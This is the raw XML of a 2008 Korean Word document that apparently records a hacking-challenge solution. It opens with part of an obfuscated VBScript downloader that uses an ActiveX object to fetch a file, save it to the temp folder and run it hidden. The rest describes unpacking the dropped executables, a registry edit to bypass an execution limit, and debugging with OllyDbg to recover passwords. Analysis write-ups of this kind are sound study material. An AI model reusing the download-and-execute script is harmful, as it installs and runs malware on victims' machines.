          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    Set varc = document.createElement("object")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    varc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturla="down"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturlb="file"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturlc="copy"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturld="exit"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vari="Microsoft.XMLHTTP"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    Set vard = varc.CreateObject(vari,"")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturlf="Ado"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturlg="db."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturlh="Str"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    seturli="eam"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    varf=seturlf&amp;seturlg&amp;seturlh&amp;seturli</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    varg=varf</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    set vara = varc.createobject(varg,"")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vara.type = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    varh="GET"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vard.Open varh, slax, False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vard.Send</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var9="gat3_cod3.com"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    set varb = varc.createobject("Scripting.FileSystemObject","")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    set vare = varb.GetSpecialFolder(2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vara.open</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var8="vara.BuildPath(vara,var8)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var7="varb.BuildPath(varb,var7)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var6="varc.BuildPath(vard,var6)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var5="vard.BuildPath(varf,var5)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var4="vare.BuildPath(varg,var4)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var3="varf.BuildPath(varh,var4)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var2="varg.BuildPath(vari,var3)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var1="varh.BuildPath(varg,var1)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    var0="vari.BuildPath(vark,var0)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    var9= varb.BuildPath(vare,var9)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vara.write vard.responseBody</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vara.savetofile var9,2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vara.close</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    set vare = varc.createobject("Shell.Application","")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C03B05" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t xml:space="preserve">    vare.ShellExecute var9,BBS,BBS,"open",0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00FD5356">
      <w:r>
        <w:t>c0d3ga73.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C03B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 다운 받아서 실행하면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3개 파일이 컴퓨터에 생성됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>각각 1.exe, 2.exe, 3.exe로 부르겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.exe를 실행시키니 다시 3개 파일이 생성됬습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3_1.exe, 3_2.exe, 3_3.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ilemon을 통해서 파일실행과정을 모니터링 한 결과 slaxc0re.exe.exe가 실행에 필요하다는 것을 알았습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00231E35" w:rsidRPr="00231E35" w:rsidRDefault="00231E35">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">실행제한이 걸려있어서 RegEdit를 이용해서 해당 키값을 </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 수정한 후 실행했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00231E35" w:rsidRDefault="00231E35"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slaxc0re.exe</w:t>
      </w:r>
      <w:r w:rsidR="00231E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 생성해서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00231E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>실행한</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 다음 다시 실행한 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRPr="00231E35" w:rsidRDefault="00C03B05"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C03B05" w:rsidTr="00C03B05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C03B05" w:rsidRDefault="00231E35" w:rsidP="00231E35">
            <w:r>
              <w:t>476F546F222F5077307061532F5561723347723361372E65786522</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 파일 맨 뒷부분에 첨가된다는 것을 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 아스키 값으로 출력하면</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C03B05" w:rsidTr="00C03B05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C03B05" w:rsidRDefault="00231E35" w:rsidP="00231E35">
            <w:r>
              <w:t>GoTo"/Pw0paS/Uar3Gr3a7.exe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>임을 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해당되는 URL에서 파일을 받으면 aspack으로 언팩된걸 확인할 수 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00231E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00231E35" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>언팩하고</w:t>
      </w:r>
      <w:r w:rsidR="00231E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ollydbg로 비교문 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">주소에 bp를 걸면 </w:t>
      </w:r>
      <w:r w:rsidR="00231E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">특정 레지스터에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>패스워드를 확인할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRPr="00231E35" w:rsidRDefault="000A65FD"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A65FD" w:rsidTr="000A65FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00507F1B" w:rsidRDefault="00507F1B" w:rsidP="00507F1B">
            <w:r>
              <w:t>00A2BB98  55 61 72 65 41 47 72 65  UareAGre</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00507F1B" w:rsidRDefault="00507F1B" w:rsidP="00507F1B">
            <w:r>
              <w:t>00A2BBA0  61 74 4D 61 6E 21 40 23  atMan!@#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A65FD" w:rsidRDefault="00507F1B" w:rsidP="00507F1B">
            <w:r>
              <w:t>00A2BBA8  24 00 A2 00 4A 00 00 00  $.?J...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00631465" w:rsidRDefault="00631465"/>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="00231E35">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>실행하면 파일이 전체화면 되면서 암호를 출력합니다.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00231E35" w:rsidTr="00231E35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00231E35" w:rsidRDefault="00231E35">
            <w:r w:rsidRPr="00231E35">
              <w:t>w3ar3the KoreaHacker is B35T</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00231E35" w:rsidRPr="00C03B05" w:rsidRDefault="00231E35"/>
    <w:sectPr w:rsidR="00231E35" w:rsidRPr="00C03B05" w:rsidSect="00EA202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EB5" w:rsidRDefault="00421EB5" w:rsidP="00631465">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00421EB5" w:rsidRDefault="00421EB5" w:rsidP="00631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EB5" w:rsidRDefault="00421EB5" w:rsidP="00631465">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00421EB5" w:rsidRDefault="00421EB5" w:rsidP="006314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EE3"/>
    <w:rsid w:val="000A65FD"/>
    <w:rsid w:val="001C470E"/>
    <w:rsid w:val="00231E35"/>
    <w:rsid w:val="002A39B6"/>
    <w:rsid w:val="00421EB5"/>
    <w:rsid w:val="004502C1"/>
    <w:rsid w:val="00507F1B"/>
    <w:rsid w:val="00631465"/>
    <w:rsid w:val="006C4AB0"/>
    <w:rsid w:val="00903459"/>
    <w:rsid w:val="009177E9"/>
    <w:rsid w:val="00A32325"/>
    <w:rsid w:val="00B53470"/>
    <w:rsid w:val="00C03B05"/>
    <w:rsid w:val="00E46CE9"/>
    <w:rsid w:val="00E563A5"/>
    <w:rsid w:val="00E87EE3"/>
    <w:rsid w:val="00EA2026"/>
    <w:rsid w:val="00EA24E2"/>
    <w:rsid w:val="00F44264"/>
    <w:rsid w:val="00FD5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2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502C1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02C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B05"/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="001932" w:themeColor="text1"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="001932" w:themeColor="text1"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="001932" w:themeColor="text1"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="001932" w:themeColor="text1"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="001932" w:themeColor="text1"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="001932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3146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631465"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0063146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631465"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="제목 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004502C1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4502C1"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19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서강대</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14942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cspclab</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>JUNEXP</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-03-26T03:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-03-26T03:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>